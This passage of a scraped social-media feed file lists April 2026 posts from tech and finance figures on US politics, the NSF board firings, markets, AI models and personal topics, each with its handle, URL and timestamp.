on Trump's proposed 55% cut to NSF's budget. The board was helping fight back. So Trump fired the board.\n\nMarvi Matos Rodriguez, one of the fired members, told reporters she had been reviewing an 80-page report as part of her board duties just days before being terminated. \n\nKeivan Stassun, a physicist at Vanderbilt, said NSF's leadership had already stopped responding to board oversight requests months ago. \"We would ask them, 'Are you following board governance directives?' And their answer would be, in effect, 'We don't listen to you anymore.'\"\n\nNow there's no board to answer to.\n\nRep. Zoe Lofgren of California, the top Democrat on the House Science Committee, called it \"the latest stupid move made by a president who continues to harm science and American innovation. Will the president fill the NSB with MAGA loyalists who won't stand up to him as he hands over our leadership in science to our adversaries?\"\n\nThat's the actual question. \n\nBecause while Trump is firing American scientists, China is building research universities at a rate we cannot match. The CDC just buried a study showing vaccines work.\n\n RFK Jr. runs HHS. The EPA is gutted. The Forest Service is being broken. Half of American children are breathing dangerous air. And now the people who decide what gets researched in the United States have all been fired by email on a Friday afternoon.", + "url": "https://nitter.net/Gianl1974/status/2048453901930660058#m", + "published_at": "2026-04-26T17:27:23+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "Who made this?!", + "url": "https://nitter.net/Jason/status/2048450286902235560#m", + "published_at": "2026-04-26T17:13:01+00:00", + "source": "nitter" + }, + { + "handle": "elonmusk", + "account": "@elonmusk", + "name": "Elon Musk", + "title": "RT by @elonmusk: In shocking news, calling your political opponents Nazis makes crazy people want to kill them. Who could have predicted this?", + "url": "https://nitter.net/KonstantinKisin/status/2048448438715445382#m", + "published_at": "2026-04-26T17:05:40+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "I’m proud to announce I’m hosting an exhibition cage match between @Acosta and @mtracey on July 4th \n\n$100,000 cash prize \n\nVegas \n\n3, 3 minute rounds", + "url": "https://nitter.net/Jason/status/2048437340218044499#m", + "published_at": "2026-04-26T16:21:34+00:00", + "source": "nitter" + }, + { + "handle": "charliebilello", + "account": "@charliebilello", + "name": "Charlie Bilello", + "title": "RT by @charliebilello: Does a government shutdown negatively impact the stock market?\n\nNo.\n\nThe S&P 500 has gained an average of 0.4% during prior shutdowns and is up 4.8% during the current shutdown which is the longest in history at 70 days and counting.\n\n$SPX", + "url": "https://nitter.net/charliebilello/status/2048436641451155650#m", + "published_at": "2026-04-26T16:18:48+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "Once again, the substack party result in a Donnybrook — it’s like the source awards for wordmaxxers", + "url": "https://nitter.net/Jason/status/2048436081725464959#m", + "published_at": "2026-04-26T16:16:34+00:00", + "source": "nitter" + }, + { + "handle": "elonmusk", + "account": "@elonmusk", + "name": "Elon Musk", + "title": "RT by @elonmusk: 25% of very liberal people say political violence can “sometimes be justified.”\n\nAmong very conservative people it’s just 3%.\n\nIn other words, the far left is 8x more likely to support political violence as the far right.\n\nStop pretending this is a “both sides” problem. It’s not.", + "url": "https://nitter.net/RobertMSterling/status/2048435593244237849#m", + "published_at": "2026-04-26T16:14:38+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: Existential risk mongers are a small, very vocal cult with a lot of very clever online astroturfing skills. \n\nPoliticians never waste a good fake crisis, which is why they're perfect for Bernie to try to seize the means of production back from the private sphere.\n\nImagine if a mainstream politician put the Heaven's Gate suicide cult on the platform in 1997?\n\nThat's where we are in American politics at the edges today. \n\nWe've jumped the shark into the absurd and we've completely lost the thread of reality in America today.\n\nAnd it isn't AI that caused this madness. It is good old fashioned human hallucination, story telling and delusion.\n\nSociety should never make policy about imaginary future threats that have no actual basis in reality. AI is already used by billions and it is nothing like what people imagined it to be and we're all still here and the problems have been ridiculously minimal even by the standards of past tech revolutions.\n\nIf I told you there was a technology where 1.5 million people would die every year and injure 50 million would you sign up for that tech? The answer is yes because it's cars. You probably got in one today and accepted that risk and never even thought about it.\n\nIn contrast, the amount of people who died or were injured by AI is a tiny fraction of a percent and even those cases are probably specious at best.\n\nIn fact, AI has actually saved countless lives. It's saved lives through drug discovery by helping create the COVID and flu vaccines. It's saved lives through anti-lock breaks. It's saved lives with self driving cars that are 10X safer than human drivers and yet the only thing you read about self driving cars in the news are the incredibly rare stories of the very few times it did actually kill a dog or injure someone.\n\nIf that sounds irrational and insane that's because it is.\n\nWe're worried about a technology with a nearly perfect track record of safety and are totally fine with a technology that kills people every day?\n\nWelcome to the irrationality of the human mind!\n\nIf the pause AI cult had their way we'd still be stuck on GPT2 which was a hallucinating mess and we'd have made no progress to the much more sound and highly aligned and intelligent and useful models we have now.\n\nThat's because you can't make progress by imagining it in your mind or writing idiotic essays on Less Wrong to other mental masturbators. \n\nYou solve problems in the real world through trial and error. \n\nThe way to make AI safe is by building it and iterating in the real world. \n\nThere is no other way.", + "url": "https://nitter.net/Dan_Jeffries1/status/2048432684930654430#m", + "published_at": "2026-04-26T16:03:04+00:00", + "source": "nitter" + }, + { + "handle": "elonmusk", + "account": "@elonmusk", + "name": "Elon Musk", + "title": "If they’re willing to die to assassinate, imagine what they will do if they gain political power", + "url": "https://nitter.net/elonmusk/status/2048428921536868583#m", + "published_at": "2026-04-26T15:48:07+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "feels like a good time to seriously rethink how operating systems and user interfaces are designed\n\n(also the internet; there should be a protocol that is equally usable by people and agents)", + "url": "https://nitter.net/sama/status/2048428561481265539#m", + "published_at": "2026-04-26T15:46:41+00:00", + "source": "nitter" + }, + { + "handle": "elonmusk", + "account": "@elonmusk", + "name": "Elon Musk", + "title": "RT by @elonmusk: Deployment of 25 @Starlink satellites confirmed", + "url": "https://nitter.net/SpaceX/status/2048427420366324024#m", + "published_at": "2026-04-26T15:42:09+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "\"post-AGI, no one is going to work and the economy is going to collapse\"\n\n\"i am switching to polyphasic sleep because GPT-5.5 in codex is so good that i can't afford to be sleeping for such long stretches and miss out on working\"", + "url": "https://nitter.net/sama/status/2048426122854228141#m", + "published_at": "2026-04-26T15:37:00+00:00", + "source": "nitter" + }, + { + "handle": "charliebilello", + "account": "@charliebilello", + "name": "Charlie Bilello", + "title": "RT by @charliebilello: The 12.5% gain in the S&P 500 over the last 4 weeks was the 20th biggest 4-week advance for the index since 1950. $SPX\n\nVideo: https://www.youtube.com/watch?v=p5e0ThPjIAg&t=646s", + "url": "https://nitter.net/charliebilello/status/2048419415222259820#m", + "published_at": "2026-04-26T15:10:21+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "Seeing two types of founders emerge in this moment:\n\nThe tourists and the terminators. \n\nThe terminators are salivating at the opportunity ahead. Hungrier than ever. More ambitious than ever. They want it more than ever. \n\nThe tourists. They want to sell. They are scared. They do not want to commit 10 years to such uncertainty. \n\nPack is separating.", + "url": "https://nitter.net/HarryStebbings/status/2048418806867870115#m", + "published_at": "2026-04-26T15:07:55+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "RT by @DavidSacks: Cole Allen, the gunman from last night’s WH Correspondents Dinner, maintained an active online presence, especially on the leftwing social media platform Bluesky where he went by the handle http://ColdForce.bsky.social with multiple references violence and guns.\n\nIn one post he calls President Trump the Antichrist.\n\nIn another he recommends buying guns in reaction to Trump’s DOJ exploring ways to ban firearm purchases from transgenders.\n\nIn one post he calls Trump a sociopathic mob boss and in another referred to him as a traitor with known connections to Putin, repeating a favorite leftwing Russian Hoax talking point.\n\nHe also attacks JD Vance for advocating an end to America’s funding the war in Ukraine and for his criticisms of the Pope. He seems pretty fixated on Ukraine more generally.\n\nHe also frequently interacts with Will Stancil’s Bluesky account, among others.", + "url": "https://nitter.net/AndrewKolvet/status/2048417712439689346#m", + "published_at": "2026-04-26T15:03:35+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "RT by @paulg: Yeah okay, Lego bros, brodettes and brotheys are cooked with this one.\n\nGPT 2 Image can create full Lego sets! With actual Bricklink IDs so you can order the parts and build it.\n\nWhole new business opportunity here for the taking.", + "url": "https://nitter.net/DennisonBertram/status/2048413815675539816#m", + "published_at": "2026-04-26T14:48:06+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "Every post, I block and report a couple accounts using AI-generated replies. It feels much the same as picking up litter on a city street; I don't know if it has any effect, but it feels like I ought to at least try to keep the site clean.", + "url": "https://nitter.net/paulg/status/2048413578789634100#m", + "published_at": "2026-04-26T14:47:09+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "Durer was the original Dr Seuss.", + "url": "https://nitter.net/paulg/status/2048411898081583547#m", + "published_at": "2026-04-26T14:40:28+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "Writing a talk to give in Stockholm. The prospect of speaking to a large group of people is no longer frightening, but writing a talk is as much work as ever. I'm no longer afraid of audiences, but I'm still just as afraid of making mistakes.", + "url": "https://nitter.net/paulg/status/2048411021329453562#m", + "published_at": "2026-04-26T14:36:59+00:00", + "source": "nitter" + }, + { + "handle": "charliebilello", + "account": "@charliebilello", + "name": "Charlie Bilello", + "title": "RT by @charliebilello: The stock market is at an all-time high.\n\nCredit spreads are near all-time lows.\n\nAnd inflation has been above the Fed's target level for 61 consecutive months, averaging 4% per year since 2019.\n\nSo why is the Fed expanding its balance sheet (QE)?\n\nVideo: https://www.youtube.com/watch?v=p5e0ThPjIAg&t=1433s", + "url": "https://nitter.net/charliebilello/status/2048406550897729561#m", + "published_at": "2026-04-26T14:19:13+00:00", + "source": "nitter" + }, + { + "handle": "charliebilello", + "account": "@charliebilello", + "name": "Charlie Bilello", + "title": "RT by @charliebilello: On March 30, the S&P 500 was down 7% in 2026, the 12th worst start to a year in history. After one of the biggest 4-week rallies ever, it's now up +5% YTD and above the average year at this point in time (+3%). There is no impossible in markets.\n\nVideo: https://www.youtube.com/watch?v=p5e0ThPjIAg&t=646s", + "url": "https://nitter.net/charliebilello/status/2048401720540061794#m", + "published_at": "2026-04-26T14:00:02+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "The best founders I know all text their investors. \n\nNone of them email them. \n\nThe relationship will blossom and deepen in a matter of messages.", + "url": "https://nitter.net/HarryStebbings/status/2048400836024283246#m", + "published_at": "2026-04-26T13:56:31+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "RT by @Jason: Random pic of @Jason protecting our $TAO bags", + "url": "https://nitter.net/nordin_eth/status/2048399674269213067#m", + "published_at": "2026-04-26T13:51:54+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "Shooting oneself in the foot?\nNope.\nShooting oneself in the prefrontal cortex.", + "url": "https://nitter.net/ylecun/status/2048399621492236615#m", + "published_at": "2026-04-26T13:51:41+00:00", + "source": "nitter" + }, + { + "handle": "charliebilello", + "account": "@charliebilello", + "name": "Charlie Bilello", + "title": "RT by @charliebilello: Global Inflation Rates are on the RISE...\n\nVideo: https://www.youtube.com/watch?v=p5e0ThPjIAg&t=1433s", + "url": "https://nitter.net/charliebilello/status/2048397937156518387#m", + "published_at": "2026-04-26T13:45:00+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "RT by @paulg: 'Action is now needed': Over 60 ex-U.K. ambassadors call to sanction Israel over West Bank\nhttps://www.haaretz.com/west-bank/2026-04-26/ty-article/.premium/over-60-ex-uk-ambassadors-call-to-sanction-israel-over-west-bank/0000019d-c950-d11b-a7df-ef5a5fba0000", + "url": "https://nitter.net/haaretzcom/status/2048396013816152216#m", + "published_at": "2026-04-26T13:37:21+00:00", + "source": "nitter" + }, + { + "handle": "charliebilello", + "account": "@charliebilello", + "name": "Charlie Bilello", + "title": "RT by @charliebilello: With the exception of Bitcoin, every major asset class is now in positive territory on the year...\n\nVideo: https://www.youtube.com/watch?v=p5e0ThPjIAg&t=973s", + "url": "https://nitter.net/charliebilello/status/2048394162366533935#m", + "published_at": "2026-04-26T13:30:00+00:00", + "source": "nitter" + }, + { + "handle": "charliebilello", + "account": "@charliebilello", + "name": "Charlie Bilello", + "title": "RT by @charliebilello: The S&P 500 ended the week at another all-time high, its 9th of the year. $SPX\n\nVideo: https://www.youtube.com/watch?v=p5e0ThPjIAg&t=646s", + "url": "https://nitter.net/charliebilello/status/2048390341221404827#m", + "published_at": "2026-04-26T13:14:49+00:00", + "source": "nitter" + }, + { + "handle": "elonmusk", + "account": "@elonmusk", + "name": "Elon Musk", + "title": "RT by @elonmusk: How do you think the left redistributes wealth?\n\nViolence\n\nHow do you think the left seizes the means of production?\n\nViolence\n\nHow do you think they censor and surveil opponents?\n\nViolence\n\nWhat do you think the left means by “the struggle”?\n\nViolence", + "url": "https://nitter.net/TheAliceSmith/status/2048390094529216982#m", + "published_at": "2026-04-26T13:13:50+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "Good use of camouflage by Biscuit.", + "url": "https://nitter.net/paulg/status/2048370801833828507#m", + "published_at": "2026-04-26T11:57:10+00:00", + "source": "nitter" + }, + { + "handle": "JeffDean", + "account": "@JeffDean", + "name": "Jeff Dean", + "title": "RT by @JeffDean: THE FIRST MAN IN HISTORY TO BREAK 2 HOURS IN A MARATHON!!!🤯🤯🤯\n\nSabastian Sawe 🇰🇪 has just shattered the World Record at the London Marathon, running 1:59:30!!!\n\nHe makes history as the first man to officially break 2 hours in the marathon.\n\nYomif Kejelcha 🇪🇹 in his debut ran 1:59:41 to become 2nd fastest alltime, while Jacob Kiplimo 🇺🇬 finished in 2:00:28.\n\nAll under the previous World Record.", + "url": "https://nitter.net/TrackGazette/status/2048351736037826877#m", + "published_at": "2026-04-26T10:41:25+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: Never let critical thinking get in the way of extremist fantasy stories.\n\nIf you're on either side of this slider, congratulations, you may be a child in an adult costume body!\n\nBlack and white thinking is for children. \n\nWhen you become an adult it's time to put away childish things.", + "url": "https://nitter.net/Dan_Jeffries1/status/2048293118781296734#m", + "published_at": "2026-04-26T06:48:29+00:00", + "source": "nitter" + }, + { + "handle": "elonmusk", + "account": "@elonmusk", + "name": "Elon Musk", + "title": "Yeah", + "url": "https://nitter.net/elonmusk/status/2048271866914083172#m", + "published_at": "2026-04-26T05:24:02+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "The left has a serious violence problem, which @DavidSacks called out early and often. \n\nThis generation of woke democratic socialists are morally bankrupt. \n\nThey believe in looting and violence as a political tool — and they’re vocal about it. \n\nIf you called out the violent members of the January 6th riots, you also have to call out the radical left. \n\n#ballsandstrikes https://x.com/EndWokeness/status/2048217117221065201/video/1", + "url": "https://nitter.net/Jason/status/2048249992163242220#m", + "published_at": "2026-04-26T03:57:07+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "If you’re not condemning these lunatics, you’re advocating for the end of the American empire. \n\nI’m not for canceling people, but the fact the @nytimes and @newyorker not only employees these individuals, but selects them to represent their brands, shows exactly how bankrupt they are.", + "url": "https://nitter.net/Jason/status/2048247267182658004#m", + "published_at": "2026-04-26T03:46:17+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "Heroes 🫡", + "url": "https://nitter.net/Jason/status/2048245718171648271#m", + "published_at": "2026-04-26T03:40:08+00:00", + "source": "nitter" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "Saturday song\n\nhttps://youtu.be/D8MoLNxLE98?si=yRsm9viuy3NYvnJ0", + "url": "https://nitter.net/eladgil/status/2048230781739581745#m", + "published_at": "2026-04-26T02:40:47+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "RT by @sama: That's exactly my view too, roughly compresses 2 weeks of our previous jobs to 1 day", + "url": "https://nitter.net/SebastienBubeck/status/2048224374264885396#m", + "published_at": "2026-04-26T02:15:19+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "how can they write code so fast?!", + "url": "https://nitter.net/sama/status/2048165186482389253#m", + "published_at": "2026-04-25T22:20:08+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "R to @sama: (and we will fix the former)", + "url": "https://nitter.net/sama/status/2048160448340767038#m", + "published_at": "2026-04-25T22:01:18+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "we still get looksmaxxed on frontend a little but we IQmog hard now", + "url": "https://nitter.net/sama/status/2048160404376105179#m", + "published_at": "2026-04-25T22:01:08+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "x.com/i/spaces/1nGeLyjZrkvKX", + "url": "https://nitter.net/Jason/status/2048151434928017429#m", + "published_at": "2026-04-25T21:25:29+00:00", + "source": "nitter" + }, + { + "handle": "charliebilello", + "account": "@charliebilello", + "name": "Charlie Bilello", + "title": "RT by @charliebilello: New video is up: \n\n📈The Week in Charts - breaking down the most important charts and themes in markets...\n\nhttps://www.youtube.com/watch?v=p5e0ThPjIAg", + "url": "https://nitter.net/charliebilello/status/2048128721286992166#m", + "published_at": "2026-04-25T19:55:14+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: OPINION: \"Trump’s mismanagement has resulted in death, destruction, wasted tax dollars, and a huge loss in respect for the United States — all to accomplish nothing.\" https://ebx.sh/V5TJjQ", + "url": "https://nitter.net/PhillyInquirer/status/2048118689258487857#m", + "published_at": "2026-04-25T19:15:22+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "nightmare blunt rotation", + "url": "https://nitter.net/Jason/status/2048116521436590260#m", + "published_at": "2026-04-25T19:06:45+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "today #knicks \n\n@mikal_bridges to 6th man/leads the bench in scoring \n\nKnicks play @23savage____ 26 minutes, he has 5 offensive boards \n\nWe're up 20+ points in the second half \n\n@ATLHawks backs broken; they realize we've figured it out \n\nseries over \n\n@nyknicks in six", + "url": "https://nitter.net/Jason/status/2048116362766127514#m", + "published_at": "2026-04-25T19:06:07+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "RT by @DavidSacks: .@POTUS: \"We want to beat China at the industry. We're leading with crypto, we're leading with AI, and I really feel I have an obligation... as a President, I have to be able to make sure that all of our industries do well. Crypto's a big industry.\"", + "url": "https://nitter.net/RapidResponse47/status/2048111588930986354#m", + "published_at": "2026-04-25T18:47:09+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "RT by @Jason: AngelList introduced USVC: venture investing for non-accredited investors starting at $500. Hear why Jason thinks the social media criticisms lack merit and says: \"More liquidity for investors is always a good thing. Let a thousand flowers bloom.”\n\nPlus:\n\n💰 Was the NYT wrong to host a discussion about “micro-looting”?\n\n🪖 A Special Forces soldier was insider trading on Polymarket… does it matter who he bet on?\n\n💵 Why rich families teach their kids about finance but public schools don’t.\n\nIt’s a TWiST Saturday special!\n\n0:00 Intro\n1:18 Naval's $500 VC Fund Explained\n5:54 Should You Trust Critics With 2K Followers?\n7:21 Learn By Betting — Jason's Philosophy\n10:10 Northwest Registered Agent - Get more when you start your business with Northwest. In 10 clicks and 10 minutes, you can form your company and walk away with a real business identity — Learn more at https://www.northwestregisteredagent.com/twist\n12:30 The Maduro Polymarket Scandal\n13:28 Should the Military Bet on Missions?\n19:55 LinkedIn Jobs - Hire right, the first time. Post your first job and get $100 off towards your job post at https://LinkedIn.com/twist\n29:32 NYT Defends Theft & \"Social Murder\"\n30:28 There Is No Moral Equivalence\n33:41 The Nepo Baby Behind the Article\n35:42 Prof G's \"Resist & Unsubscribe\" Movement\n37:54 Walk The Walk — Hasan, Bernie & Performative Outrage\n44:49 Teaching Kids About Money\n48:21 The Rich Get Richer & The Poor Stay Poor\n49:31 Outro\n\ncc: @Jason, @Lons, @AngelList, @Naval, @Polymarket, @nytimes\n\n🎥 Watch the full episode here 👇", + "url": "https://nitter.net/twistartups/status/2048099001782985057#m", + "published_at": "2026-04-25T17:57:08+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: When MTV News shut down, it felt like decades of culture vanished overnight 🕳️\n\nBut over 470,000 pages were already preserved.\n\nThat history didn’t disappear.\nIt was archived.\n\n📚 Read VANISHING CULTURE to see why it matters\n📖 Download & read: https://archive.org/details/vanishing-culture-2026\n🛒 Purchase in print: https://www.betterworldbooks.com/product/detail/vanishing-culture-a-report-on-our-fragile-cultural-record-9798995425014/new\n\n#VanishingCulture #DigitalMemory #InternetArchive #MTVNews #BookTwitter", + "url": "https://nitter.net/internetarchive/status/2048069805807128734#m", + "published_at": "2026-04-25T16:01:07+00:00", + "source": "nitter", + "title_zh": "从MTV新闻关闭时,感觉数十年的文化突然消失。但已有超过47万页面被保存,历史并未消失,而是被归档了。阅读《消失的文化》了解其重要性 #VanishingCulture #DigitalMemory #InternetArchive 《消失的文化》下载阅读:https://archive.org/details/vanishing-culture-2026 纸质书购买:https://www.betterworldbooks.com/product/detail/vanishing-culture-a-report-on-our-fragile-cultural-record-9798995425014/new" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "5.5 is so earnest\n\n\"little engine that could\" energy", + "url": "https://nitter.net/sama/status/2048062261584077149#m", + "published_at": "2026-04-25T15:31:08+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "RT by @Jason: The future of coding isn't reading lines of code. It's specifying outcomes and getting binaries back.\n\nElon said it. Aravind from Perplexity agrees. And startups are already making it a reality.\n\ncc: @elonmusk, @AravSrinivas, @Jason, @perplexity_ai, @ThisWeeknAI", + "url": "https://nitter.net/twistartups/status/2048057234865693125#m", + "published_at": "2026-04-25T15:11:10+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "RT by @paulg: Journalists worldwide should stand up for colleagues who are murdered.", + "url": "https://nitter.net/NickKristof/status/2048043843690561556#m", + "published_at": "2026-04-25T14:17:57+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "RT by @DavidSacks: Probably the best take I have heard on why there is so much fear around software exposure in private equity and credit because of AI\n\nFrom David Sacks\n\n\"Historically we only had two good exits for software businesses. One was IPO. The other was M&A. Then these big private equity shops came along and gave us a third potential exit. You would sell to them and then they would raise the capital based on one third equity and two third debt. So it was debt financed buyouts. \n\nIt is something that has been around in the non technology part of the economy for a long time but was a relatively new entrant in the world of technology. And the reason for that is if you have debt financed a purchase, you need to have very stable cash flows. \n\nBecause if you miss and you cant pay your interest on the debt, you will lose all your equity because the debt holders will foreclose. \n\nIt was belief for a long time that software did have predictable cash flows, at least for the mature businesses.\"", + "url": "https://nitter.net/BoringBiz_/status/2048037985765949537#m", + "published_at": "2026-04-25T13:54:41+00:00", + "source": "nitter" + }, + { + "handle": "charliebilello", + "account": "@charliebilello", + "name": "Charlie Bilello", + "title": "RT by @charliebilello: \"No one has ever been a success betting against America since 1776 — and they're not going to be a success in the future doing it, either.\" – Warren Buffett", + "url": "https://nitter.net/PeterMallouk/status/2048032027513864212#m", + "published_at": "2026-04-25T13:31:00+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "Edith and Shahed from Noora Health came to visit. They've saved over 75,000 lives so far. A small city of people.", + "url": "https://nitter.net/paulg/status/2048024967996993760#m", + "published_at": "2026-04-25T13:02:57+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "RT by @paulg: Here's YC's official advice about being truthful and precise about what is pilot, bookings, revenue and recurring revenue. \n\nFounders, particularly first time founders, need to sear this into their brains. Don't mistake one tier for another. Be precise, and always be truthful.", + "url": "https://nitter.net/garrytan/status/2048017824895909901#m", + "published_at": "2026-04-25T12:34:34+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "Whoah, self-driving cars compete with airlines. I never considered that till now.", + "url": "https://nitter.net/paulg/status/2048017345000415744#m", + "published_at": "2026-04-25T12:32:40+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "RT by @paulg: 23 years old with no advanced mathematics training solves Erdős problem with ChatGPT Pro. \"What’s beginning to emerge is that the problem was maybe easier than expected, and it was like there was some kind of mental block.”-Terence Tao https://www.scientificamerican.com/article/amateur-armed-with-chatgpt-vibe-maths-a-60-year-old-problem/", + "url": "https://nitter.net/Ananyo/status/2047992864118894954#m", + "published_at": "2026-04-25T10:55:23+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "RT by @paulg: GitHub outages since Microsoft acquisition 🤣", + "url": "https://nitter.net/vaggelisdrak/status/2047957234664030380#m", + "published_at": "2026-04-25T08:33:48+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "Hamming's talk is so important that I reproduced it on my site. It's one of the only things on my site written by someone else.\n\nhttps://paulgraham.com/hamming.html", + "url": "https://nitter.net/paulg/status/2047944827887591681#m", + "published_at": "2026-04-25T07:44:30+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "R to @paulg: Auction houses could fix this by giving you timegrapher numbers. But the only auction house that does this so far is a small Swiss one that specializes in watches (Ineichen). None of the big houses do.", + "url": "https://nitter.net/paulg/status/2047942555254288757#m", + "published_at": "2026-04-25T07:35:28+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "The best way to buy art is at auction, once you know what you're doing. But old watches you should buy from dealers. You can get enough information about paintings to judge their condition, but you have no idea what's inside watches.", + "url": "https://nitter.net/paulg/status/2047941243234107691#m", + "published_at": "2026-04-25T07:30:15+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "RT by @DavidSacks: Incredible return on investment! 💰💰💰", + "url": "https://nitter.net/elonmusk/status/2047877294476116184#m", + "published_at": "2026-04-25T03:16:09+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "SPLC invested $270k in Charlottesville and got $81 million in additional donations. Extraordinary returns.", + "url": "https://nitter.net/DavidSacks/status/2047871382923469241#m", + "published_at": "2026-04-25T02:52:39+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "Marc Benioff is the apex cloud founder. He and Salesforce have turned every previous technology wave to their advantage. Cloud, social, mobile, big data. I predict AI will be no different.", + "url": "https://nitter.net/DavidSacks/status/2047867592790946189#m", + "published_at": "2026-04-25T02:37:36+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "WTF are these lunatics up to…", + "url": "https://nitter.net/Jason/status/2047858837319774540#m", + "published_at": "2026-04-25T02:02:48+00:00", + "source": "nitter" + }, + { + "handle": "svwang1", + "account": "@svwang1", + "name": "王川(硅谷)", + "title": "自 2021年创立到 2026年三月初累积收入 (不是利润)五十亿美元出头的 anthropic, 在二级市场的估值已经超过一万亿美元。 \n\n2025年经营现金流 459亿美元, 税后利润 669亿美元的 Berkshire, 市值也是一万亿美元。", + "url": "https://nitter.net/Svwang1/status/2047858045057909226#m", + "published_at": "2026-04-25T01:59:39+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "RT by @DavidSacks: SACKS: “We're really lucky that [Trump] is President … when this AI revolution is happening.”\n\nJASON: “What would happen if Kamala ‘Ding Dong’ was in right now?”\n\nSACKS: “We'd have no data centers, they'd be using AI to censor us, and they'd be promoting DEI values through AI.”", + "url": "https://nitter.net/TheChiefNerd/status/2047842000632713369#m", + "published_at": "2026-04-25T00:55:54+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "this was a good week.\n\nproud of the team.\n\nhappy building!", + "url": "https://nitter.net/sama/status/2047823357635354814#m", + "published_at": "2026-04-24T23:41:49+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "RT by @DavidSacks: David Sacks: We're lucky that Trump's the President when this AI revolution is happening.\n\n@Jason \"Do an alt history, Sacks, what would happen if Kamala Ding Dong was in right now?\"\n\n@DavidSacks \"We'd have no data centers, and they'd be using AI to censor us, and they'd 